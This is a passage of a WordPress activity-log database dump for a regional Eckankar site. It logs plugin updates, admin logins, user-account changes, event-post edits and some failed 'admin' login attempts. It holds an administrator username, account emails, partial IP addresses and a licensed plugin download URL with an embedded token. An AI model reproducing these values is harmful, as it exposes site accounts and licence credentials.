href=\"https://premio.io/downloads/folders/\">Premio</a>'),(212712,35001,'plugin_version','2.9.8'),(212713,35001,'plugin_url',''),(212714,35001,'plugin_update_info_plugin','folders-pro/folders.php'),(212715,35001,'plugin_update_info_package','https://go.premio.io/edd-sl/package_download/MTY5NTQwNDgxOTpiMzAzYmY3OTQ5N2RiZDk3MGVmM2NjMzdjNzNhYjZlMDo2ODc6NGU2ODJhNTQ1ZTMzNTAxZWI2MTdkMDgxYTUxNGJlNzg6aHR0cHNALy9lY2thbmthci1jb2xvcmFkby5vcmc6MA=='),(212716,35001,'plugin_prev_version','2.9.7'),(212717,35001,'_message_key','plugin_bulk_updated'),(212718,35001,'_user_id','2'),(212719,35001,'_user_login','S8zhaBda'),(212720,35001,'_user_email','nada@zipnadanot.org'),(212721,35001,'_server_remote_addr','76.130.120.x'),(212722,35001,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(212723,35002,'plugin_slug','ninja-forms'),(212724,35002,'plugin_name','Ninja Forms'),(212725,35002,'plugin_title','<a href=\"http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=readme\">Ninja Forms</a>'),(212726,35002,'plugin_description','Ninja Forms is a webform builder with unparalleled ease of use and features. <cite>By <a href=\"http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=Plugins+WP+Dashboard\">Saturday Drive</a>.</cite>'),(212727,35002,'plugin_author','<a href=\"http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=Plugins+WP+Dashboard\">Saturday Drive</a>'),(212728,35002,'plugin_version','3.6.31'),(212729,35002,'plugin_url','http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=readme'),(212730,35002,'plugin_prev_version','3.6.30'),(212731,35002,'_message_key','plugin_bulk_updated'),(212732,35002,'_user_id','2'),(212733,35002,'_user_login','S8zhaBda'),(212734,35002,'_user_email','nada@zipnadanot.org'),(212735,35002,'_server_remote_addr','76.130.120.x'),(212736,35002,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(212737,35003,'plugin_slug','simple-history'),(212738,35003,'plugin_name','Simple History'),(212739,35003,'plugin_title','<a href=\"http://simple-history.com\">Simple History</a>'),(212740,35003,'plugin_description','Plugin that logs various things that occur in WordPress and then presents those events in a very nice GUI. <cite>By <a href=\"http://simple-history.com/\">Pär Thernström</a>.</cite>'),(212741,35003,'plugin_author','<a href=\"http://simple-history.com/\">Pär Thernström</a>'),(212742,35003,'plugin_version','4.6.0'),(212743,35003,'plugin_url','http://simple-history.com'),(212744,35003,'plugin_prev_version','4.5.0'),(212745,35003,'_message_key','plugin_bulk_updated'),(212746,35003,'_user_id','2'),(212747,35003,'_user_login','S8zhaBda'),(212748,35003,'_user_email','nada@zipnadanot.org'),(212749,35003,'_server_remote_addr','76.130.120.x'),(212750,35003,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(212751,35004,'plugin_slug','wp-optimize'),(212752,35004,'plugin_name','WP-Optimize - Clean, Compress, Cache'),(212753,35004,'plugin_title','<a href=\"https://getwpo.com\">WP-Optimize - Clean, Compress, Cache</a>'),(212754,35004,'plugin_description','WP-Optimize makes your site fast and efficient. It cleans the database, compresses images and caches pages. Fast sites attract moretraffic and users. <cite>By <a href=\"https://updraftplus.com\">David Anderson, Ruhani Rabin, Team Updraft</a>.</cite>'),(212755,35004,'plugin_author','<a href=\"https://updraftplus.com\">David Anderson, Ruhani Rabin, Team Updraft</a>'),(212756,35004,'plugin_version','3.2.19'),(212757,35004,'plugin_url','https://getwpo.com'),(212758,35004,'plugin_prev_version','3.2.18'),(212759,35004,'_message_key','plugin_bulk_updated'),(212760,35004,'_user_id','2'),(212761,35004,'_user_login','S8zhaBda'),(212762,35004,'_user_email','nada@zipnadanot.org'),(212763,35004,'_server_remote_addr','76.130.120.x'),(212764,35004,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(212765,35005,'plugin_slug','insert-headers-and-footers'),(212766,35005,'plugin_name','WPCode Lite'),(212767,35005,'plugin_title','<a href=\"https://www.wpcode.com/\">WPCode Lite</a>'),(212768,35005,'plugin_description','Easily add code snippets in WordPress. Insert scripts to the header and footer, add PHP code snippets with conditional logic, insert ads pixel, custom content, and more. <cite>By <a href=\"https://www.wpcode.com/\">WPCode</a>.</cite>'),(212769,35005,'plugin_author','<a href=\"https://www.wpcode.com/\">WPCode</a>'),(212770,35005,'plugin_version','2.1.3.1'),(212771,35005,'plugin_url','https://www.wpcode.com/'),(212772,35005,'plugin_prev_version','2.1.2'),(212773,35005,'_message_key','plugin_bulk_updated'),(212774,35005,'_user_id','2'),(212775,35005,'_user_login','S8zhaBda'),(212776,35005,'_user_email','nada@zipnadanot.org'),(212777,35005,'_server_remote_addr','76.130.120.x'),(212778,35005,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(212779,35006,'plugin_slug','wp-staging'),(212780,35006,'plugin_name','Backup Duplicator &amp; Migration - WP STAGING'),(212781,35006,'plugin_url','https://wordpress.org/plugins/wp-staging'),(212782,35006,'plugin_version','3.0.4'),(212783,35006,'plugin_author','WP-STAGING, WPStagingBackup'),(212784,35006,'plugin_requires_wp','3.6+'),(212785,35006,'plugin_requires_php','7.0'),(212786,35006,'plugin_install_source','web'),(212787,35006,'plugin_description','Backup Restore <cite>By <a href=\"https://wp-staging.com/backup-wordpress\">WP-STAGING, WPStagingBackup</a>.</cite>'),(212788,35006,'_message_key','plugin_installed'),(212789,35006,'_user_id','2'),(212790,35006,'_user_login','S8zhaBda'),(212791,35006,'_user_email','nada@zipnadanot.org'),(212792,35006,'_server_remote_addr','76.130.120.x'),(212793,35006,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugin-install.php?s=WP%2520STAGING&tab=search&type=term'),(212794,35007,'plugin_name','Backup Duplicator &amp; Migration - WP STAGING'),(212795,35007,'plugin_slug','wp-staging'),(212796,35007,'plugin_title','<a href=\"https://wordpress.org/plugins/wp-staging\">Backup Duplicator &amp; Migration - WP STAGING</a>'),(212797,35007,'plugin_description','Backup Restore <cite>By <a href=\"https://wp-staging.com/backup-wordpress\">WP-STAGING, WPStagingBackup</a>.</cite>'),(212798,35007,'plugin_author','<a href=\"https://wp-staging.com/backup-wordpress\">WP-STAGING, WPStagingBackup</a>'),(212799,35007,'plugin_version','3.0.4'),(212800,35007,'plugin_url','https://wordpress.org/plugins/wp-staging'),(212801,35007,'_message_key','plugin_activated'),(212802,35007,'_user_id','2'),(212803,35007,'_user_login','S8zhaBda'),(212804,35007,'_user_email','nada@zipnadanot.org'),(212805,35007,'_server_remote_addr','76.130.120.x'),(212806,35007,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugin-install.php?s=WP%2520STAGING&tab=search&type=term'),(212807,35008,'user_id','2'),(212808,35008,'user_email','nada@zipnadanot.org'),(212809,35008,'user_login','S8zhaBda'),(212810,35008,'_user_id','2'),(212811,35008,'_user_login','S8zhaBda'),(212812,35008,'_user_email','nada@zipnadanot.org'),(212813,35008,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(212814,35008,'_message_key','user_logged_in'),(212815,35008,'_server_remote_addr','76.130.120.x'),(212816,35008,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(212817,35009,'created_user_id','25'),(212818,35009,'created_user_email','sv@nit-nada-zip.org'),(212819,35009,'created_user_login','eckco staging-frontend'),(212820,35009,'created_user_role','subscriber'),(212821,35009,'created_user_first_name',''),(212822,35009,'created_user_last_name',''),(212823,35009,'created_user_url',''),(212824,35009,'send_user_notification','0'),(212825,35009,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(212826,35009,'_message_key','user_created'),(212827,35009,'_user_id','2'),(212828,35009,'_user_login','S8zhaBda'),(212829,35009,'_user_email','nada@zipnadanot.org'),(212830,35009,'_server_remote_addr','76.130.120.x'),(212831,35009,'_server_http_referer','https://eckankar-colorado.org/wp-admin/user-new.php'),(212832,35010,'edited_user_id','25'),(212833,35010,'edited_user_email','sv@nit-nada-zip.org'),(212834,35010,'edited_user_login','eckco staging-frontend'),(212835,35010,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(212836,35010,'user_prev_nickname','eckco staging-frontend'),(212837,35010,'user_new_nickname','eckco-staging-frontend'),(212838,35010,'_message_key','user_updated_profile'),(212839,35010,'_user_id','2'),(212840,35010,'_user_login','S8zhaBda'),(212841,35010,'_user_email','nada@zipnadanot.org'),(212842,35010,'_server_remote_addr','76.130.120.x'),(212843,35010,'_server_http_referer','https://eckankar-colorado.org/wp-admin/user-edit.php?user_id=25&wp_http_referer=%2Fwp-admin%2Fusers.php%3Fupdate%3Dadd%26id%3D25'),(212844,35011,'edited_user_id','25'),(212845,35011,'edited_user_email','sv@nit-nada-zip.org'),(212846,35011,'edited_user_login','eckco staging-frontend'),(212847,35011,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(212848,35011,'user_prev_role','subscriber'),(212849,35011,'user_new_role','organizer'),(212850,35011,'_message_key','user_updated_profile'),(212851,35011,'_user_id','2'),(212852,35011,'_user_login','S8zhaBda'),(212853,35011,'_user_email','nada@zipnadanot.org'),(212854,35011,'_server_remote_addr','76.130.120.x'),(212855,35011,'_server_http_referer','https://eckankar-colorado.org/wp-admin/user-edit.php?user_id=25&wp_http_referer=%2Fwp-admin%2Fusers.php%3Fid%3D25'),(212856,35012,'plugin_name','Ninja Forms'),(212857,35012,'plugin_current_version','3.6.31'),(212858,35012,'plugin_new_version','3.6.32'),(212859,35012,'_message_key','plugin_update_available'),(212860,35012,'_server_remote_addr','173.231.231.x'),(212861,35013,'deleted_user_id','25'),(212862,35013,'deleted_user_email','sv@nit-nada-zip.org'),(212863,35013,'deleted_user_login','eckco staging-frontend'),(212864,35013,'deleted_user_role','organizer'),(212865,35013,'reassign_user_id','null'),(212866,35013,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(212867,35013,'_message_key','user_deleted'),(212868,35013,'_user_id','2'),(212869,35013,'_user_login','S8zhaBda'),(212870,35013,'_user_email','nada@zipnadanot.org'),(212871,35013,'_server_remote_addr','76.130.120.x'),(212872,35013,'_server_http_referer','https://eckankar-colorado.org/wp-admin/users.php?action=delete&user=25&_wpnonce=d842ecd759'),(212873,35014,'_user_id','2'),(212874,35014,'_user_login','S8zhaBda'),(212875,35014,'_user_email','nada@zipnadanot.org'),(212876,35014,'_message_key','user_logged_out'),(212877,35014,'_server_remote_addr','76.130.120.x'),(212878,35014,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(212879,35015,'user_id','2'),(212880,35015,'user_email','nada@zipnadanot.org'),(212881,35015,'user_login','S8zhaBda'),(212882,35015,'_user_id','2'),(212883,35015,'_user_login','S8zhaBda'),(212884,35015,'_user_email','nada@zipnadanot.org'),(212885,35015,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(212886,35015,'_message_key','user_logged_in'),(212887,35015,'_server_remote_addr','76.130.120.x'),(212888,35015,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(212889,35016,'_user_id','2'),(212890,35016,'_user_login','S8zhaBda'),(212891,35016,'_user_email','nada@zipnadanot.org'),(212892,35016,'_message_key','user_logged_out'),(212893,35016,'_server_remote_addr','76.130.120.x'),(212894,35016,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(212895,35017,'failed_username','admin'),(212896,35017,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(212897,35017,'_message_key','user_unknown_login_failed'),(212898,35017,'_xmlrpc_request','true'),(212899,35017,'_server_remote_addr','74.249.245.x'),(212900,35018,'post_id','269105'),(212901,35018,'post_type','nf_sub'),(212902,35018,'post_title',''),(212903,35018,'_message_key','post_updated'),(212904,35018,'_server_remote_addr','65.130.204.x'),(212905,35018,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(212906,35019,'user_id','2'),(212907,35019,'user_email','nada@zipnadanot.org'),(212908,35019,'user_login','S8zhaBda'),(212909,35019,'_user_id','2'),(212910,35019,'_user_login','S8zhaBda'),(212911,35019,'_user_email','nada@zipnadanot.org'),(212912,35019,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(212913,35019,'_message_key','user_logged_in'),(212914,35019,'_server_remote_addr','76.130.120.x'),(212915,35019,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(212916,35020,'_user_id','2'),(212917,35020,'_user_login','S8zhaBda'),(212918,35020,'_user_email','nada@zipnadanot.org'),(212919,35020,'_message_key','user_logged_out'),(212920,35020,'_server_remote_addr','76.130.120.x'),(212921,35020,'_server_http_referer','https://eckankar-colorado.org/wp-admin/index.php'),(212922,35021,'failed_username','admin'),(212923,35021,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(212924,35021,'_message_key','user_unknown_login_failed'),(212925,35021,'_xmlrpc_request','true'),(212926,35021,'_server_remote_addr','74.249.242.x'),(212927,35022,'failed_username','admin'),(212928,35022,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(212929,35022,'_message_key','user_unknown_login_failed'),(212930,35022,'_xmlrpc_request','true'),(212931,35022,'_server_remote_addr','74.249.242.x'),(212932,35023,'user_id','15'),(212933,35023,'user_email','nadazipought@zilch.org'),(212934,35023,'user_login','john-admin-96'),(212935,35023,'_user_id','15'),(212936,35023,'_user_login','john-admin-96'),(212937,35023,'_user_email','nadazipought@zilch.org'),(212938,35023,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(212939,35023,'_message_key','user_logged_in'),(212940,35023,'_server_remote_addr','174.16.128.x'),(212941,35023,'_server_http_referer','https://eckankar-colorado.org/wp-login.php'),(212942,35024,'post_id','269106'),(212943,35024,'post_type','mec-events'),(212944,35024,'post_title','Copy of MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(212945,35024,'_message_key','post_updated'),(212946,35024,'_user_id','15'),(212947,35024,'_user_login','john-admin-96'),(212948,35024,'_user_email','nadazipought@zilch.org'),(212949,35024,'_server_remote_addr','174.16.128.x'),(212950,35024,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=90768e5abb&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=09%2F23%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=09%2F23%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(212951,35025,'post_id','269106'),(212952,35025,'post_type','mec-events'),(212953,35025,'post_title','Copy of MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(212954,35025,'_message_key','post_trashed'),(212955,35025,'_user_id','15'),(212956,35025,'_user_login','john-admin-96'),(212957,35025,'_user_email','nadazipought@zilch.org'),(212958,35025,'_server_remote_addr','174.16.128.x'),(212959,35025,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269106&action=edit'),(212960,35026,'post_id','269107'),(212961,35026,'post_type','mec-events'),(212962,35026,'post_title','Copy of SOUND OF SOUL IN PERSON TEMPLATE | Benefit Title Goes Here'),(212963,35026,'_message_key','post_updated'),(212964,35026,'_user_id','15'),(212965,35026,'_user_login','john-admin-96'),(212966,35026,'_user_email','nadazipought@zilch.org'),(212967,35026,'_server_remote_addr','174.16.128.x'),(212968,35026,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=mec-events'),(212969,35027,'post_id','269107'),(212970,35027,'post_type','mec-events'),(212971,35027,'post_title','How to Enliven Every Aspect of Your Life'),(212972,35027,'post_prev_post_title','Copy of SOUND OF SOUL IN PERSON TEMPLATE | Benefit Title Goes Here'),(212973,35027,'post_new_post_title','How to Enliven Every Aspect of Your Life'),(212974,35027,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Tagline Goes Here<br>\r\n</span></strong></span><span style=\"font-size: 18pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/286733007/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(213167,35044,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(213166,35044,'failed_username','admin'),(213164,35043,'_xmlrpc_request','true'),(213165,35043,'_server_remote_addr','74.249.245.x'),(213163,35043,'_message_key','user_unknown_login_failed'),(213162,35043,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(213161,35043,'failed_username','admin'),(213160,35042,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269111&action=edit'),(213159,35042,'_server_remote_addr','174.16.128.x'),(213158,35042,'_user_email','nadazipought@zilch.org'),(213156,35042,'_user_id','15'),(213157,35042,'_user_login','john-admin-96'),(213155,35042,'_message_key','post_updated'),(213154,35042,'post_new_post_date_gmt','2023-09-22 04:33:19'),(213153,35042,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(213151,35042,'post_prev_post_date','2023-09-21 22:32:26'),(213152,35042,'post_new_post_date','2023-09-21 22:33:19'),(213150,35042,'post_new_post_status','publish'),(213149,35042,'post_prev_post_status','draft'),(213148,35042,'post_title','Spiritual Experiences'),(213147,35042,'post_type','mec-events'),(213146,35042,'post_id','269111'),(213145,35041,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269111&action=edit'),(213144,35041,'_server_remote_addr','174.16.128.x'),(213143,35041,'_user_email','nadazipought@zilch.org'),(213142,35041,'_user_login','john-admin-96'),(213140,35041,'_message_key','post_updated'),(213141,35041,'_user_id','15'),(213139,35041,'post_new_thumb_title','PathToGod'),(213138,35041,'post_new_thumb_id','269112'),(213137,35041,'post_new_post_date','2023-09-21 22:32:26'),(213136,35041,'post_prev_post_date','2023-09-21 22:30:02'),(213135,35041,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Accelerate Your Pursuit of Truth<br>\r\n</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Keys to&nbsp;<strong>accelerate your pursuit of truth</strong>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual experiences are experiences which go beyond normal earthly experiences. We live in a time of unprecedented interest in spirituality. Spiritual experiences are part of everyday living for millions of people.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Go to the holy of the holies. It is the temple inside you. This is the place where all truth comes from. …”</span><br>\r\n<span style=\"font-size: 14pt;\">― Harold Klemp, <em>Spiritual Experiences Guidebook</em>, p. 5</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Contemplation is a method that enables you to begin to&nbsp;<strong>actively explore the inner worlds</strong>&nbsp;of your own being.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will be&nbsp;<strong>utilizing the tools</strong> and exercises in the <em>Spiritual Experiences Guidebook</em>&nbsp;in this interactive class.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>References:</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Online:</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To learn more about ‘Spiritual Experiences‘, visit:&nbsp;<a class=\"!text-viridian\" href=\"https://spiritualexperience.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://spiritualexperience.org/</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Book</strong>:</span><br>\r\n<span style=\"font-size: 14pt;\">‘<em>Spiritual Experiences Guidebook</em>‘</span><br>\r\n<span style=\"font-size: 14pt;\">by Harold Klemp</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This interactive book and CD answer questions and validate spiritual experiences for people of all faiths.</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckbooks.org/items/-1512-0.html\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://www.eckbooks.org/items/-1512-0.html</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Table of Contents - ‘<em>Spiritual Experiences Guidebook</em>‘:&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckbooks.org/content/pdf/Spir_Exp_Guide_TOC.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://www.eckbooks.org/content/pdf/Spir_Exp_Guide_TOC.pdf</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">For a&nbsp;<strong>free book</strong>&nbsp;and CD, go to:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://spiritualexperience.org/guidebook-download-form/\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://spiritualexperience.org/guidebook-download-form/</a></span><br>\r\n<span style=\"font-size: 14pt;\">or you can call</span><br>\r\n<span style=\"font-size: 14pt;\">1-888-LOVE-GOD (1-888-568-3463)</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">——</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The&nbsp;<strong>inner</strong>&nbsp;<strong>worlds</strong>:</span><br>\r\n<span style=\"font-size: 14pt;\">The Worlds can best be described as planes of reality. Each plane corresponds to a certain state of consciousness and vibration.</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckankar.org/the-god-worlds-of-eck/\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://www.eckankar.org/the-god-worlds-of-eck/</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Web page for this SEGAMeetup:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.meetup.com/segofaurora/events/296051211/\" target=\"_blank\" rel=\"noopener\">https://www.meetup.com/segofaurora/events/296051211/</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The next SEGAM Zoom video | conference call Meetup will be on Wednesday, November 1st at 7:00 p.m. We will discuss ‘<a class=\"!text-viridian\" href=\"https://www.eckankar.org/wp-content/uploads/2021/02/Finding_Your_Lifes_Purpose.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">Finding Your Lifes Purpose</a>’.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"http://meetup.com/SEGofAurora/events\" target=\"_blank\" rel=\"noopener\">http://meetup.com/SEGofAurora/events</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Event Presented by</span><br>\r\n<span style=\"font-size: 14pt;\">ECKANKAR</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">http://www.eckankar-colorado.org</a></span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofaurora/events/296051211/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(213134,35041,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Accelerate Your Pursuit of Truth<br>\n</span></strong></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Keys to&nbsp;<strong>accelerate your pursuit of truth</strong>.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual experiences are experiences which go beyond normal earthly experiences. We live in a time of unprecedented interest in spirituality. Spiritual experiences are part of everyday living for millions of people.</span></p>\n<blockquote class=\"\">\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Go to the holy of the holies. It is the temple inside you. This is the place where all truth comes from. …”</span><br>\n<span style=\"font-size: 14pt;\">― Harold Klemp, <em>Spiritual Experiences Guidebook</em>, p. 5</span></p>\n</blockquote>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Contemplation is a method that enables you to begin to&nbsp;<strong>actively explore the inner worlds</strong>&nbsp;of your own being.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will be&nbsp;<strong>utilizing the tools</strong> and exercises in the <em>Spiritual Experiences Guidebook</em>&nbsp;in this interactive class.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>References:</strong></span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Online:</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To learn more about ‘Spiritual Experiences‘, visit:&nbsp;<a class=\"!text-viridian\" 